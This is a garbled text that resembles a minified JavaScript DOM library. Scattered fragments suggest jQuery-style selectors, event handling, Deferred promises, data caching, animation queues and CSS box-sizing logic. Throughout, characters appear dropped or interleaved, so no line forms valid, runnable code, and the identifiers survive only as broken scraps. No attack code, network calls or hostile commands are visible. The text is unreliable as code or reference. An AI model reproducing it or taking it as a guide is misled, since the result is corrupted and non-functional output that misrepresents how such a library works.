,=]s0uelnt,=ul=;<;+)oes)&n&nori|(.uho,&tps())rtr }ucinT(,,,,,)rtr &![]&rT(),&![]&iT(,),efnto(,,,)vrlcfp[,=]halnt,=|b(|\"\"sndTp?s:,],=e|o&?:egpesu,=?|(?:|r?]ayi(&nyvsu,)lw(,)rl[,,)cllnt;hl(-)flc)&vdc]!ydc]f)i()i(|e{fi{=]cvlnt;hl(-)fvc)&.uhyc=)inl,=]lu}=.eghwiec-(=[]&(=?(,)pc)-&([]!al=)}es =ev=avslc(,.egh:)iinl,,,)Lapyav}}ucinC()frvrtnioelnt,=.eaiee0.ye,=|rrltv[ ]ua10cm(ucine{eune=t,,0,=efnto()rtr (,)-}s!)p[ucinenr{a =a&r|!=)|(=)ndTp?(,,)fenr)rtr =uli]uou+i(=.eaieeu.ye)=m(ep,);lei(nrfle[[]tp]apynl,[]mths)b)fri+uioi+i(.eaieei.ye)ra;eunT(>&x()u1&eesie0u1.oct{au: ==[-]tp?*:\").elc(,$\",,<&C(.lc(,),<&C(=.lc(),<&v()}.uhn}eunx()fnto eet{a =.egh0ielnt>,=ucinoasuc{a ,,,=,=0,=&[,=]wlCo|&rfn.A(*,)ET=ul=?:ahrno(|.,=.eghfrc&la=d||c;!=&nl!(=[];+)i(&f{=,|fonrouet=d|pf,=g;hl(=[+]i((,|ds)ups()bekc&TE}&(f!&f&v-o&.uhf)i(+mn&!=)h0wieyth+)(,,,)i()i(>)hl(-)[]|[]|bm=.alu)bw()Lapyub,&!&blnt>&vtlnt>&o.nqeotu}eunc&TElw,}rtr ?eo:}eunso.opl=ucinet{a ,=]i[,=[+ ]i(o{|(=(),=.eghwien-(=etn)[]rps()ips()(=(,eir).eetrertr }uo.eetfnto(,,,)vroulcfp\"ucin=tpo &ed!&aepslco|e;fnn|]1=dlnt)i(ud0=[]sie0)lnt>&\"D==lu0)tp&9=tndTp&g&.eaieu1.ye)i((=rfn.Dlmths0.elc(,e,)|][])eunnp&ttprnNd)eesieusit)vlelnt)oVnesotx.ete?:.eghwieo-{fluo,.eaiecltp]beki(frfn[]&(=(.ace[]rpaeZe)Kts([]tp)&etprnNd)|))i(.pieo1,(=.egh&eu)rtr .pl(,)nbek}rtr(|sed)it!,,t|.ete&g(.aetoe|t,}nsrSal=.pi(\".otD.on\")=bndtcDpiae=!,(,.oteahdu(ucine{eun1ecmaeouetoiindcetEeet\"ilst)},efnto()rtr .neHM=< rf''<a\"\"\"=efrthl.eAtiue\"rf))|e\"yehe|egtwdh,ucinetn{f!)eunegttrbt(,tp\"=ttLwrae)12},.trbts&efnto()rtr .neHM=<nu/\"efrthl.eAtiue\"au\"\")\"==.isCidgttrbt(vle))|e\"au\"fnto(,,)i(n&ipt==.oeaetLwrae)rtr .ealVle)u(ucine{eunnl=egttrbt(dsbe\"}|l(,ucinetn{a ;f!)eun0=et?.ooeCs(:regttrbtNd()&rseiidrvlenl},e()wfn=,.xrEslcoswep[:]wep.suo,.nqeotwuiu=.nqeotwtx=.eTx,.sMDcEiXLwcnan=.otiswecpSlco=.saevrkfnto(,,)vrr[,=od0=nwie(=[]&9=endTp)f1=endTp)i(&we.sn)ra;.uhe}eunr,=ucinet{o(a =]eeenxSbig1=endTp&e=t&.uhe;eunn,=.xrmthnesotx;ucinNet{eunendNm&endNm.ooeCs(==.ooeCs(}a =^(az[\\\\>\\2\\\\\\\\])\\2\\\\\\\\]\\?(:\\\\>)/;ucinjetn{eungt?.rpefnto(,)rtr!tcl(,,)=n)tndTp?.rpefnto()rtr ==!=}:srn\"=yeftwge(,ucine{eunucl(,)-!=}:.itrten}.itrfnto(,,)vrrt0;eunn&e\"nt\"e\"\",==.egh&==.oeyewfn.aceSlco(,)[][:.idmthsewge(,ucine{eun1=endTp}),.netn(fn:ucine{a ,,=hslnt,=hsi(srn\"=yefertr hspsSakwe.itrfnto({o(=;<;+)fwcnan([]ti)rtr!})frnti.uhtc(],=;<;+).ideit,)rtr >?.nqeotn:}fle:ucine{eunti.uhtc((hse|]!)}ntfnto()rtr hspsSakjti,|[,0),sfnto()rtr!jti,srn\"=yefe&.ete?()e|]!)lnt})vrqL/(:s([wW+)^]|(\\-+)/(.nii=ucinetn{a ,;f!)eunti;fnn|,srn\"=yefe{f!i\"\"=e0&\"\"=eelnt-]&.egh=?nl,,ul:.xce)|i1&trtr!|tjur?t|)fn()ti.osrco()fn()i([]{fttisaco ?[]twmreti,.asHM([]t&.oeyetonrouet|:,0)Ats([]&wiPanbett)o( ntgti[]?hsi([]:hsat(,[];eunti}eunorgtlmnBI([])&ti[]oti.egh1,hsrtr .oeye(hs0=,hslnt=,hs:()vi !=.ed?.ed()ew:.aera(,hs}.rttp=.nqwr;a =^?prnspe(:ni|l)/O{hlrn!,otns!,et!,rv!}wf.xed{a:ucine{a =(,hs,=.eghrtr hsfle(ucin)frvre0ene+i(.otisti,[])eun0),lss:ucinet{a ,=,=hslnt,=]a\"tig!tpo &we;f!.ete)o(rir+frnti[]n&!=;=.aetoei(.oeye1&(?.ne()-:==.oeye&.idmthseetrne){.uhn;ra}eunti.uhtc(.egh1wuiuSr()o}idxfnto()rtr ?srn\"=yefeucl(()ti[]:.alti,.qeye0:)ti[]&hs0.aetoeti.is(.rvl(.egh-}adfnto(,)rtr hspsSakwuiuSr(.eg(hsgt)wet)),dBc:ucine{eunti.d(ul=?hspeOjc:hspeOjc.itre)};ucinPet{hl(eet)&!=.oeye;eunewec(prn:ucine{a =.aetoertr &1!=.oeyetnl}prnsfnto()rtr (,prnNd\"}prnsni:ucinetn{eunke\"aetoe,),etfnto()rtr (,nxSbig),rvfnto()rtr (,peiuSbig),etl:ucine{eunke\"etiln\"}peAlfnto()rtr (,peiuSbig),etni:ucinetn{eunke\"etiln\"n}peUtlfnto(,,)rtr (,peiuSbig,),ilnsfnto()rtr (eprnNd|{)frthl,),hlrnfnto()rtr (.isCid}cnet:ucine{eunNe\"fae)ecnetouet((,tmlt\"&(=.otn|e,.eg(]ecidoe)},ucinet{.ne=ucinnr{a =.a(hstn;eunUtl!=.lc(5&(=)r&srn\"=yefr&iwfle(,),hslnt>&([]|.nqeoti,.ete&irvre),hspsSaki})vrM/^x0trnf+gfnto ()vrt{;eunwec(.ac()|]fnto(,)tn=0)twClbcsfnto()e\"tig=tpo ?()wetn(}e;a ,,,,=]a[,=1ufnto({o(=|eoc,==0alnt;=1{=.hf(;hl(+<.egh!==[]apyn0,[]&esoOFle&solnt,=1}.eoy|n!)t!,&(=?]\"),=adfnto({euno&n&t&solnt-,.uhn)fnto ()wec(,ucinnr{()euiu&lhsr|ops()r&.egh&srn\"=xr&tr}}agmns,&!&u),hs,eoefnto({eunwec(ruet,ucinet{a ;hl(nwiAryton)-).pien1,<s&-},hs,a:ucine{eunewiAryeo>1olnt>}epyfnto({euno&o[)ti}dsbefnto({eunia[,==\"ti}dsbe:ucin)rtr!}lc:ucin)rtr ==]n||(==\",hs,okdfnto({eun!}frWt:ucinen{euni|n[,nn|].lc?.lc(:]aps()t|()ti}fr:ucin)rtr .ieihti,ruet)ti}frdfnto({eun!};eunl;ucinIe{eunefnto ()trwefnto (,,,)vritye&(=.rms)icl()dn()fi()e&(=.hn?.aletn:.pl(od0[]sier)cthe{.pl(od0[]}wetn(Dfre:ucint{a =[ntf\"\"rges,.alak(mmr\",.alak(mmr\",][rsle,dn\"wClbcs\"nemmr\",.alak(oc eoy)0\"eovd][rjc\"\"al,.alak(oc eoy)wClbcs\"nemmr\",,rjce\"]r\"edn\"i{tt:ucin)rtr }awy:ucin)rtr .oeagmns.alagmns,hs,cth:ucine{eunite(ule}pp:ucin)vreagmnsrtr .eerdfnto()wec(,ucinnr{a =([[])&[[];[[](ucin)vrei&.pl(hsagmns;&gepoie?.rms(.rgestntf)dn(.eov)fi(.eet:[[]\"ih]ti,?e:ruet)))enl}.rms(}te:ucintri{a =;ucinatnri{eunfnto({a =hsuagmnslfnto({a ,;f!to)i(erapysu)=npoie)trwnwTpErr\"hnbesl-eouin)le&\"bet=tpo |\"ucin=tpo )&.hngl??.aleaonIi,(,,,):o+lcl(,(,,,)aonWi,(,,,.oiyih):r=I&svi ,=e)(|nrsleih(,)},=?:ucin)tyl)cthe{.eerdecpinok&.eerdecpinokecsakrc)t1=&(!=&(=od0u[],.eetihsu)}tc)(.eerdgttcHo&(.tcTaewDfre.eSakok),.eTmotc)}eunwDfre(ucine{[]3.d((,,()iIentfWt),[]3.d((,,()tI)n2[]ada0egr?:)}.rms(}poiefnto()rtr ul=?.xedei:},=}rtr .ahnfnto(,)vrat2,=[]it1]aads&.d(ucin)rs,[-]2.ial,[-]3.ial,[]2.okn0[]lc)aadt3.ie,[[]=ucin)rtr [[]\"ih]ti==?od0ti,ruet)ti}ot0+Wt\"=.ieih)ipoieo,&tcl(,)o,hnfnto()vrtagmnslnt,=,=ra()iocl(ruet)awDfre(,=ucine{eunfnto()re=hsie=ruet.egh1ocl(ruet)n-t|.eovWt(,)}i(<1&$eadn(().eov,.eet!)\"edn\"=asae)|([]&[]te))eunate(;hl(-)([]sn,.eet;eunapoie)};a =^Ea|nenlRneRfrneSna|yeUIErr/wDfre.xetoHo=ucintn{.osl&ecnoewr&t&.ettnm)&.osl.an\"QeyDfre xeto:\"tmsaetsakn}wrayxeto=ucint{.eTmotfnto({ho }}vrFwDfre(;.nrayfnto()rtr .hne[cth]fnto()wrayxeto())ti}wetn(iRay!,edWi:,ed:ucine{!==?-.edWi:.sed)|wiRay!,0=e&-.edWi>|Frsleihr[])},.ed.hnFte;ucin_)rrmvEetitnr\"OCnetodd,)ermvEetitnr\"od,)wray)\"opee==.edSae|laig!=.edSae&rdcmnEeetdSrl?.eTmotwray:radvnLsee(DMotnLae\"_,.dEetitnr\"od,);a =ucinetnrioa{a =,=.eghlnl=ni(ojc\"=xn)i!;o( nnzetsns,0oa}lei(od0=r&i!,()|a!)l&a(.aler,=ul:lttfnto(,,)rtr .alwe,)),)fr;<;+)([]narrcl([]stes,))rtr ?:?.ale:?([]n:}X/-s/U/(az)gfnto (,)rtr .opeCs(}ucinGe{eunerpaeX\"s\".elc(,)vrYfnto()rtr ==.oeye|==.oeye|+.oeye;ucinQ)ti.xad=.xad+.i+}.i=,.rttp=ccefnto()vrteti.xad]rtr |(=}Ye&(.oeyeeti.xad]tOjc.eierpryeti.xad,vletcniual:0))t,e:ucinetn{a ,=hsccee;f\"tig=tpo )[()=;lefrri )[()=[]rtr }gtfnto(,)rtr od0=tti.ah()eti.xad]&[hsepno[()}acs:ucinetn{eunvi ==|t&srn\"=yeft&od0=nti.e(,)(hsstetn,od0=nnt}rmv:ucinet{a ,=[hsepno;fvi !=)i(od0=t{=tAryiAryt?.a()(=()i ?t:.ac()|].eghwien-dlt [[]}vi ==|wiEpybetr)&endTp?[hsepno=od0dlt [hsepno)}hsaafnto()vrteti.xad]rtr od0=t&wiEpybett};a =e ,=e ,=^?\\[wW*}\\[wW*]$,e/AZ/;ucint()rtr\"re==|\"as\"=e&\"ul==?ule=++\"+:.ete?SNpree:)fnto eetn{a ;fvi ==&1=endTp)fr\"aa\"trpaee,-&)tLwrae)\"tig=tpo(=.eAtiuer){r{=en}ac()}.e(,,)es =od0rtr }.xed{aDt:ucine{eunKhsaae|Jhsaae}dt:ucinetn{eunKacs(,,),eoeaafnto(,)Krmv(,),dt:ucinetn{eunJacs(,,),rmvDt:ucinet{.eoeet})wf.xed{aafnto(,)vrnrioti[]ao&.trbtsi(od0=e{fti.egh&iKgto,==.oeye&Jgto\"aDtAts))nalnt;hl(-)[]&==ran.ae.neO(dt-)&rGrsie5)n(,,[])Jsto\"aDtAts,0}eunirtr\"bet=tpo ?hsec(ucin)Kstti,))zti,ucint{a ;fo&od0=t{fvi !=nKgtoe)rtr ;fvi !=nn(,))eunnes hsec(ucin)Kstti,,)),ultagmnslnt>,ul!),eoeaafnto()rtr hsec(ucin)Krmv(hse}})wetn(qeefnto(,,)vrri()eunt(|\"x)\"uu\"rJgtet,&(r|ra.sra()rJacs(,,.aera():.uhn)r|],euu:ucinet{=|\"x;a =.uu(,)rnlnt,=.hf(,=.qeeok(,)afnto({.euu(,);ipors\"=i&insit)r-,&(f\"=t&.nhf(ipors\",eeeoso,.aleao)!&o&.mt.ie),qeeok:ucinet{a =+qeeok\"rtr .e(,)|.cesen{mt:.alak(oc eoy)adfnto({.eoee[+qee,]}}})wf.xed{uu:ucinet{a =;eunsrn\"=yefe&tee\"x,-)agmnslnt<?.uu(hs0,)vi ==?hsti.ahfnto({a =.uu(hset;.qeeok(hse,f\"=e&ipors\"=n0&wdqeeti,)),euu:ucine{eunti.ahfnto({.euu(hse}}ceruu:ucine{eunti.uu(|\"x,]}poiefnto(,)vrnr1iwDfre(,=hsati.eghsfnto({-|irsleiho[]}\"tig!tpo &(=,=od0,=|\"x;hl(-)nJgtoa,+qeeok\")&.mt&(+,.mt.d();euns)ipoiet})vrr=[-??\\*.)d(:e]+]\\+).orei=e eEp\"(:[-)|(+e\"(az])\"\"\",e[Tp,Rgt,Bto\"\"et]a=ucinet{eunnn\"=(=|e.tl.ipa|\"==.tl.ipa&wcnan(.weDcmn,)&nn\"=wcse\"ipa\"}s=ucinetnr{a ,,=}froi )[]esyeo,.tl[]to;=.pl(,|[)froi ).tl[]ao;euni;ucinu(,,,)vrioa2,=?ucin)rtr .u(}fnto({eunwcset\"),=(,=&n3|(.sNme[]\":p\",=wcsubrt|\"x!=&+)&eee(.s(,);fc&[]=l{/2ll|[]c+|1wiea-wsyeetcl,1o*1(=(/|.)<0&a0,/oc=,.tl(,,+)nn|]rtr &(=c|u|,=[]c([]1*[]+[]r&rui=,.tr=,.n=),}a e{;ucinc()vrtneonrouetrendNm,=er;euni|tnbd.pedhl(.raelmn(),=.s(,dsly)tprnNd.eoehl()\"oe==&(=bok)l[]ii}ucinf(,)frvrnri[,=,=.eghoao+(=[].tl&(=.tl.ipa,?\"oe==&([]Jgtr\"ipa\"|nl,[]|rsyedsly\"),\"=rsyedsly&er&([]c())\"oe!=&([]\"oe,.e(,dsly,))fro0oao+nl!io&([]syedslyio)rtr }.netn(so:ucin)rtr eti,0}hd:ucin)rtr eti),ogefnto()rtr\"ola\"=yefeeti.hw)ti.ie)ti.ahfnto({eti)wti)so(:(hs.ie))};a e/(:hcbxrdo$id=<[-]^/0\\2\\\\\\\\])ih=^|mdl$\\(:aaem)citig=oto:1\"slc utpe'utpe>,<slc>]ted[,<al>,<tbe\",o:2\"tbe<ogop\"\"/ogop<tbe\",r[,<al>toy\"\"/bd>/al>]t:3\"tbe<bd>t>,<t>/bd>/al>]_eal:0\",\"}g.pgopg.ping.bd=etotg.ogopg.ato=etedg.hg.dfnto eet{a ;eunn\"neie\"=yefegtlmnsyaNm?.eEeetBTgaet|*)\"neie\"=yefeqeyeetrl?.urSlcoAlt|*)[,od0=t|&Net?.eg(e,)nfnto eet{o(a =,=.eghnrn+Jsten,goaEa\"!|Jgttn,goaEa\")vrm=<&?w;;ucinx(,,,,)frvroasulcftcetDcmnFamn(,=]d0helnt;<;+)f(=[]|0=oi(ojc\"=xo).eg(,.oeye[]o;lei(ets(){=|fapnCidtcetEeet\"i\")s(eee()|\",\")1.ooeCs(,=es|g.dfutainrTLu1+.tlrfle()u2,=[]wiec-aalsCidwmrepacidoe)(=.isCid.etotn=\"es .uhtcetTxNd();.etotn=\"d0wieopd+)fr&.nra(,)-)&ips()es flwcnan(.weDcmn,)ay(.pedhl()\"cit)l&ea,)c0wieoac+)ets(.ye|\"&nps()rtr }fnto({a =.raeouetrget)apnCidrcetEeet\"i\")trcetEeet\"nu\";.eAtiue\"ye,rdo)tsttrbt(cekd,cekd)tsttrbt(nm\"\"\",.pedhl()hcekln=.lnNd(0.lnNd(0.athl.hce,.neHM=<etrax/etra\"hnCoehce=!.lnNd(0.athl.ealVle(;a erdcmnEeetw=^e/T=^?muepitrcneteuda|rp|lc/C=^[.*(:..));ucinE({eun0fnto e)rtr!}ucinS({r{eunratvEeetcthe{}ucinD(,,,,,)vrasi(ojc\"=yeft{srn\"=yefn&rr|,=od0;o( ntD(,,,,[]o;eunei(ul=&nl=i(=,==od0:ul=&(srn\"=yefn(=,=od0:irrnnvi ),1=iik;lei(irtr ;eun1=o&ai(=ucine{eunw)ofe,.pl(hsagmns}.udagi|(.udwgi+),.ahfnto({.vn.d(hstirn}}.vn=goa:}adfnto(,,,,)vroasulcfpdhgyJgte;fy{.ade&(=on.ade,=.eetr,&wfn.aceSlco(ei,.ud|ngi=.ud+,uyeet)|uyeet=},ayhnl)|ayhnl=ucint{eunudfnd!tpo &weettigrd=ttp?.vn.ipthapyeagmns:od0)l(=t|\".ac()|\"].eghwiel-dg(=eee([]|[)1,=s2|\")slt\"\".ot)d&fweetseild|{,=ifdlgtTp:.idye|dfweetseild|{,=.xed{yedoiTp:,aarhnlrngi:.udslco:,edCneti&.xrmthnesotx.eti,aepc:.on\"\"}o,pud)|(=[][)dlgtCut0fstp&1=fstpcl(,,,)|.dEetitnr&.dEetitnrda)fad&fadcl(,)chnlrgi|(.ade.udngi),?.piepdlgtCut+0c:.uhc,.vn.lbld=0},eoefnto(,,,,)vroasulcfpdhgyJhsaae&Jgte;fy&uyeet){=t(|\")mthM|[\")lnt;hl(-)fsC.xctl)|]dgs1,=s2|\")slt\"\".ot)d{=.vn.pca[]|}pud(?.eeaeyefbnTp)|]|]ss2&nwRgx((|\\)+.on\"\\(:*\\|\"+(\\|))aoplnt;hl(-)=[]!&g=coiTp|n&.ud=cgi|s&sts(.aepc)|&r=cslco&(*\"=r|cslco)|pslc(,)cslco&pdlgtCut-frmv&frmv.alec)a&plnt&(.eron&1=ftadw.alehyhnl)|.eoevn(,,.ade,eeeud)es o( nuweetrmv(,+[]nr!)wiEpybetu&Jrmv(,hnl vns)}dsac:ucine{a =.vn.i()nrioasunwAryagmnslnt)l(.e(hs\"vns)|}[.ye|[,=.vn.pca[.ye|{;o([]tn1nagmnslnt;+)[]agmnsn;ftdlgtTre=hs!.rDsac|!!=.rDsac.alti,){=.vn.adescl(hstl,=;hl(osn+)&tiPoaaintpe()tcretagtoee,=;hl(aohnlr[+]&!.smeitPoaaintpe().nmsae&traepc.etanmsae|(.adeb=,.aaadt,od0=(=(.vn.pca[.rgye|{)hnl|ahnlr.pl(.lmu)&1=(.euti&(.rvnDfut)tsoPoaain))rtr .otipth&.otipthcl(hst,.eut}hnlr:ucinet{a ,,,,,=]utdlgtCutletre;fu&.oeye&(cik==.ye&.utn=)fr;!=hsllprnNd|ti)f1=lndTp&(cik!=.ye|0=ldsbe){o(=]a{,=;<;+)od0=ai(=[].eetr\"\"&([]rnesotx?(,hs.ne()-:.iditi,ul[].egh,[]&.uhr;.egh&.uh{lmlhnlr:}}eunlti,<.egh&.uh{lmlhnlr:.lc())s,dPo:ucinet{betdfnPoet(.vn.rttp,,eueal:0cniual:0gtgt?ucin)i(hsoiiaEetrtr (hsoiiaEet}fnto({fti.rgnlvn)eunti.rgnlvn[],e:ucint{betdfnPoet(hse{nmrbe!,ofgrbe!,rtbe!,au:}}),i:ucine{eunewepno?:e .vn(),pca:la:nBbl:0,ou:tigrfnto({fti!=e)&hsfcsrtr hsfcs)!}dlgtTp:fcsn}bu:tigrfnto({fti==e)&hsbu)eunti.lr)!}dlgtTp:fcsu\",lc:tigrfnto({f\"hcbx==hstp&ti.lc&Nti,ipt)rtr hscik)!}_eal:ucine{eunNetre,a)}bfrula:psDsac:ucine{od0=ersl&eoiiaEet&eoiiaEetrtrVleersl)}}wrmvEetfnto(,,)ermvEetitnr&.eoevnLsee(,),.vn=ucinet{f!ti ntnefwEet)eunnwwEetet;&etp?ti.rgnlvn=,hstp=.yeti.sealPeetdedfutrvne|vi ==.ealPeetd&1=ertrVleE:eti.agtetre&3=etre.oeyeetre.aetoeetre,hscretagtecretagtti.eaeTre=.eaeTre)ti.yeet&.xedti,)ti.ietm=&etmSap|aenw)ti[.xad]!}wEetpooye{osrco:.vn,sealPeetdk,srpgtoSopdk,smeitPoaaintpe:eiSmltd!,rvnDfutfnto({a =hsoiiaEetti.sealPeetdE,&!hsiSmltd&.rvnDfut),tprpgto:ucin)vreti.rgnlvn;hsiPoaaintpe=ee&ti.siuae&esoPoaain),tpmeitPoaainfnto({a =hsoiiaEetti.smeitPoaaintpe=ee&ti.siuae&esoImdaerpgto(,hssoPoaain)}wec(ate:0bbls!,aclbe!,hneTuhs!,tle:0dti:0eeths:0mtKy!,ae:0pgY!,hfKy!,iw!,ca\"!,hroe!,e:0kyoe!,utn!,utn:0cinX!,let:0ofeX!,fst:0pitrd!,oneTp:0sreX!,cen:0treTuhs!,olmn:0tuhs!,hc:ucine{a =.utnrtr ul=.hc&w.etetp)nl!ecaCd?.hroeekyoe!.hc&vi !=&T.etetp)1t12t34t20ewih}weetadrp,.ah{osetr\"osoe\"mueev:mueu\"pitrne:pitrvr,onelae\"oneot}fnto(,)weetseile=dlgtTp:,idyethnl:ucine{a ,=hsierltdagtoehnlOjrtr &(==|wcnan(,)|(.yeooiTp,=.ade.pl(hsagmns,.yet,}},.netn(o:ucinetnr{eunD(hsetnr}oefnto(,,,)rtr eti,,,,,),f:ucinetn{a ,;fe&.rvnDfut&.adeb)eunrehnlOjwedlgtTre)ofrnmsaeroiTp+.+.aepc:.rgyerslco,.ade)ti;f\"bet=tpo )frii )hsofitei)rtr hsrtr!!=&\"ucin!tpo |(=,=od0,1=n&nk)ti.ahfnto({.vn.eoeti,,,))};a e/(!rab|o|me|rigiptln|eaprm([-]^/0\\2\\\\\\\\])^])//iA=<cit<tl|ln/,e/hce\\*?[=|\\*cekd)iq=^s<(:[DT\\|-|?\\\\|->s$gfnto eet{eunNe\"al\"&N1!=.oeyettfrthl,t\"?()cide(toy)0|eefnto ee{eunetp=nl!=.eAtiue\"ye)+/+.yeefnto ee{euntu/==etp|\")sie05?.yeetp.lc()ermvAtiue\"ye)efnto eet{a ,,,,,,,;f1=tndTp)i(.aDt()&oJacs()aJstto,=.vns)dlt .adeaeet=}frii )o(=,=[]lnt;<;+).vn.d(,,[]n)Khsaae&(=.cese,=.xed{,)Ksttu)}ucinM(,)vrntndNm.ooeCs(;ipt==&p.etetp)tcekdecekd\"nu\"=n&txae\"=n|tdfutau=.ealVle}ucinR(,,,)taapy[,)vriosulcf0pelnt,=-,=[]vgy;fv|>&\"tig=tpo &!.hcCoe&ets()rtr .ahfnto()vroee()v&t0=.alti,,.tl))R(,,,))i(&(=ete0.weDcmn,1er,=.isCid1=icidoe.egh&io,|r)fru(=.a(ei\"cit)H).eghfpf+lif=d&lwcoel!,0,&wmresy(,srp\"),.alef,,)i()o(=[.egh1.weDcmn,.a(,e,=;<;+)=[]h.etltp|\")&Jacs(,goaEa\"&wcnan(,)&lsc&mdl\"=(.ye|\".ooeCs(?.eaUl&.eaUllsc:(.etotn.elc(e\")cl)rtr }ucinI(,,)frvrritwfle(,)eo0nl!(=[];+)|1=rndTp|wcenaay(),.aetoe&n&.otisronrouetr&v(er\"cit),.aetoermvCidr)rtr }.xed{tlrfle:ucine{eunerpaeN,<1<$>),ln:ucinetn{a ,,,,=.lnNd(0,=.otiseonrouete;f!hnCoehce|1=endTp&1!=.oeye|.sMDce)fray()r0i(=ee)lnt;<;+)eor,[];fti()o(=|y()aa|es,=,=.eghrir+P([]ar)es ees;eunay(,srp\")lnt>&v(,u&ee\"cit),}cenaafnto()frvrtnriweetseilo0vi !=neo)o+i((){ftnJepno)i(.vnsfrri .vnsir?.vn.eoenr:.eoevn(,,.ade;[.xad]vi }[.xad]&nKepno=od0}},.netn(dtc:ucine{eunI(hse!),eoefnto()rtr eti,),etfnto()rtr (hsfnto()rtr od0=ewtx(hs:hsepy)ec(ucin)1=ti.oeye&1=ti.oeye&!=hsndTp|(hstxCnete}}nl,,ruet.egh}apn:ucin)rtr eti,ruet,ucine{!=hsndTp&1!=hsndTp&9=ti.oeye|eti,)apnCide}}peedfnto({eunR(hsagmnsfnto()i(==hsndTp|1==hsndTp|9=ti.oeye{a =eti,)tisrBfr(,.isCid}),eoefnto({eunR(hsagmnsfnto()ti.aetoe&hsprnNd.neteoeeti)),fe:ucin)rtr eti,ruet,ucine{hsprnNd&ti.aetoeisrBfr(,hsnxSbig}}epyfnto({o(a ,=;ul=eti[];+)==.oeye&wcenaay(,1)etxCnet\")rtr hs,ln:ucinet{eunenl!e&,=ul=?:,hsmpfnto({eunwcoeti,,)),tlfnto()rtr (hsfnto()vrtti[]|}n0rti.eghi(od0=e&==.oeyertr .neHM;f\"tig=tpo &!ets()&g[d.xce|[\"\"][]tLwrae))ewhmPeitre;r{o(nrn+1=(=hsn|{)ndTp&(.laDt(et!),.neHM=)t0cthe{}&ti.mt(.pede}nl,,ruet.egh}rpaeihfnto({a =]rtr eti,ruet,ucint{a =hsprnNd;.nra(hse<&(.laDt(eti),&nrpaehl(,hs),)},.ah{pedo\"ped,rpnT:peed,neteoe\"eoe,netfe:atr,elcAl\"elcWt\",ucinet{.ne=ucine{o(a ,=]iwe,=.egh1a0a=;+)===?hsti.ln(0,([][]n,.pl(,.e()rtr hspsSakr})vrW=e eEp\"(+e\"(!x[-%+\"\"\",efnto()vrntonrouetdfutiwrtr &noee|(=)ngtoptdtl(),enwRgx(eji(|)\"\";fnto({ucint)i()lsyecset\"oiinaslt;et-11p;it:0xmri-o:p;adn:;odr0,.tl.sTx=psto:eaiedslybokbxszn:odrbxoefo:colmri:uobre:p;adn:p;it:0;o:%,eapnCidl.pedhl()vrtegtoptdtl()i\"%!=.o,=2=ntmriLf)csyergt\"0\"s3==(.ih)o3==(.it)csyepsto=aslt\"a3==.fstit|\"boue,ermvCidl,=ul}ucinne{eunMt.on(asFote)vrioasulrcetEeet\"i\",=.raelmn(dv)csye&csyebcgonCi=cnetbx,.lnNd(0.tl.akrudlp\",.laCoetl=cnetbx==.tl.akrudlpwetn(,bxiigeibefnto({eunt)o,ieBxtlsfnto({eunt)s,iePsto:ucin)rtr (,}rlalMriLf:ucin)rtr (,}srlbxiefnto({eunt)a})(;ucinF(,,)vrrioasesyertr(=|$()&(\"=(=.ePoetVlet|nt)|.otiseonrouete|(=.tl(,),hpxloSye(&W.eta&B.ett&(=.it,=.iWdhosmxit,.iWdhsmxit=.it=,=.it,.it=,.iWdhismxit=),od0=aa\":}ucin_(,)rtr{e:ucin)i(e)rtr(hsgtt.pl(hsagmns;eeeti.e}}a e/(oetbe?-[a)+/X=^-,e{oiin\"boue,iiiiy\"idn,ipa:bok}V=lteSaig\"\"fnWih:40}G=\"ekt,Mz,m\",ercetEeet\"i\".tl;ucinQ()i( nY)eunevrte0.opeCs(+.lc()nG.eghwien-i(eG[]ti ertr }ucinJ()vrtwcsrp[]rtr |(=.sPose=ee|e,}ucinK(,,)vrri.xct;eunrMt.a(,[](|0)([]|p\":}ucinZ(,,,,,)vra\"it\"=t10s0u0i(==r\"odr:cnet)rtr ;o(a4a=)mri\"=n&u=.s(,+ea,0i)r(cnet==&(-wcse\"adn\"o[]!,),mri\"=n&u=.s(,bre\"o[]\"it\"!,))(+wcse\"adn\"o[]!,)\"adn\"=nu=.s(,bre\"o[]\"it\"!,)s=.s(,bre\"o[]\"it\"!,);eunr&>0&u=ahmx0Mt.ele\"fst+[]tUprae)tsie1]ous.))ufnto tetn{a =ee,=eetr,=bre-o\"=wcse\"oSzn\"!,)aoi(ets(){f!)eunii\"uo}eunaa&hbxiigeibe)|==.tl[],\"uo==|!asFoti&\"nie==.s(,dsly,1r)&ie\"fst+[]tUprae)tsie1]a!)(=asFoti|0+eetn|o\"odr:cnet)ari+p\"wetn(csok:oaiy{e:ucinet{ft{a =ee\"pct\";eun\"=n\"\"n}}csubr{nmtoIeainon:0clmCut!,ilpct:0feGo:0feSrn:0fnWih:0lnHih:0oaiy!,re:0opas!,ios!,Idx!,om!}csrp:}syefnto(,,,)i(&3=endTp&8=endTp&esye{a ,,,=()uX.ett,=.tl;fu|tJ(),=.sHost|wcsok[]vi ==)euna>i &vi !=iagte!,)?:[]\"tig=(=yefn&(=eee()&i1&(=eeti,=nme\",ul=&n=n&\"ubr==&(+i&[]|wcsubrs?\"\"x),.laCoetl|\"!=|0=tidxf\"akrud)|lt=ihrt)a&sti &vi ==nastenr)|ulstrprytn:[]n)}csfnto(,,,)vrioasGt;eunX.ett|(=es)(=.sHost|wcsok[]&\"e\"na&iagte!,),od0=i&iF(,,),nra\"=i& nV&(=et)\"==|n(=asFoti,0=n|siieo?|0i:})wec(\"egt,wdh]fnto(,)wcsok[]{e:ucinenr{fnrtr!ets(.s(,dsly)|egtletet(.egh&.eBudnCinRc(.it?tetr:eeU,ucin)rtr tetr}}stfnto(,,)vrio$()a\"odrbx==.s(,bxiig,1o,=&Z(,,,,)rtr &hsrlbxie)=opsto&(-Mt.ele\"fst+[]tUprae)tsie1]prela([]-eet\"odr,1o-5)s&ii.xcn)&p\"=([]|p\"&(.tl[]nnwcset)K(,,)})wcsok.agnet_(.eibeagnetfnto(,)i()eunprela(ee\"agnet)|egtonigletet)lf-ee{agnet0,ucin)rtr .eBudnCinRc(.et)+p\")wec(mri:\"pdig\",odr\"it\",ucinet{.sHoset=epn:ucinn{o(a =,=}o\"tig=tpo ?.pi( )[]r4r+ieo[]t=[]|[-]|[]rtr },mri\"=e&wcsok[+]stK))wf.xed{s:ucinet{eunzti,ucinetn{a ,,=}a0i(ra.sra(){o(=ee,=.eghaia+ota]wcseta,1r;eunortr od0=nwsyeetn:.s(,),,,ruet.egh1})fnto 